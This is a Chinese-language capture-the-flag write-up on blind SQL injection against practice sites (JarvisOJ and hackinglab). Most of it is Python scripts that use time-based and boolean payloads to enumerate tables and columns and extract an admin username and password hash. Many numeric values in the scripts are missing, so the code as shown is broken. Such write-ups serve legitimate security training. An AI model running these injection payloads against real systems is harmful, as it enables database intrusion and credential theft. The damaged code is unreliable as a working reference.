最近看了一些盲注习题,在这里想总结一下吧。
盲注其实可以代替任何注入,但基本的注入比盲注简单。在这里我先解析几道盲注的习题。
1. JSOJ的题目
Simple Injection
1. 首先用wvs扫描器扫描网站
发现了sql盲注漏洞 并且是sleep注入
2. 利用给出的payload初步尝试
/*'XOR(if(,sleep(),))OR'*/
确实有延迟效果,那么下面就是写代码了
3. 利用sleep延迟注入,编写python脚本
首先得到数据表名(注意有空格过滤)
首先得到数据表名(注意有空格过滤)
利用此代码爆破数据表名
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(,):
for j in dic:
id="/*'XOR(if(ord((select/**/substr(table_name,{0},1)/**/from/**/information_schema.tables/*!where*/table_schema=database()))={1},sleep(3),0))OR'*/".format(str(i),ord(j))
data={
'username':id,
'password':
}
print j
s=requests.post(url=url,data=data)
sec=s.elapsed.seconds
if sec > :
string+=j
break
print string
接着要利用此代码爆破 字段名称
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(,):
for j in dic:
id="/*'XOR(if(ord((select/**/substr(group_concat(column_name),{0},1)/**/from/**/information_schema.columns/*!where*/table_name='admin'/**/limit/**/1))={1},sleep(3),0))OR'*/".format(str(i),ord(j))
data={
'username':id,
'password':
}
print j
s=requests.post(url=url,data=data)
sec=s.elapsed.seconds
if sec > :
string+=j
break
print string
利用上面爆出来的字段名称爆字段内容
将/*'XOR(if(1,sleep(ord(substr(password,{0},1))-47),0))OR'*/作为payload
代码如下
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
for i in range(,):
id="/*'XOR(if(1,sleep(ord(substr(username,{0},1))-97),0))OR'*/".format(str(i))
data={
'username':id,
'password':
}
s=requests.post(url=url,data=data)
sec=s.elapsed.seconds
string+=chr(+int(sec))
print string
结果为admin
再替换payload变为
/*'XOR(if(1,sleep(ord(substr(password,{0},1))-47),0))OR'*/
就可以爆出密码了
爆出的密码为cfb59c9d74849801d5acdcfdaadc3
或者利用以下代码进行暴库也可以
# by zy
# 10.15.2016
import requests
url=r'http://web.jarvisoj.com:32787/login.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(,):
for j in dic:
id="/*'XOR(if(ord(substr(password,{0},1))>{1},sleep(3),0))OR'*/".format(str(i),ord(j))
data={
'username':id,
'password':
}
s=requests.post(url=url,data=data)
sec=s.elapsed.seconds
if sec < :
string+=j
break
print string
后面就不写了
推荐一个md5解码网站
2.hackinglab题目
注入关 2
这道题我把他强行转化为盲注的题目来练手^_^.首先找到盲注的条件
当id=1 and 1=2时
文段中没有显示任何东西
当id=1时
文段中有显示
满足盲注条件
爆数据表
import requests
cookies={
'PHPSESSID': '944d46747cd9059f63dc2e103b2fe31a'
}
dic='3_abcdefghijklmnopqrstuvwxyz'
string = ''
for i in range(,):
for j in dic:
url='http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and ord((select substr(table_name,{0},1) from information_schema.tables where table_schema=database())) = {1}'.format(str(i),ord(j))
s=requests.get(url=url , cookies=cookies)
content=s.content
length=len(content)
print length
if length > :
string+=j
break
print string
爆字段名称
import requests
cookies={
'PHPSESSID': '944d46747cd9059f63dc2e103b2fe31a'
}
dic='3_abcdefghijklmnopqrstuvwxyz'
string = ''
for i in range(,):
for j in dic:
url='http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and ord((select substr(group_concat(column_name),{0},1) from information_schema.columns where table_name="sae_user_sqli3")) = {1}'.format(str(i),ord(j))
s=requests.get(url=url , cookies=cookies)
content=s.content
length=len(content)
print length
if length > :
string+=j
break
print string
idtitlecontent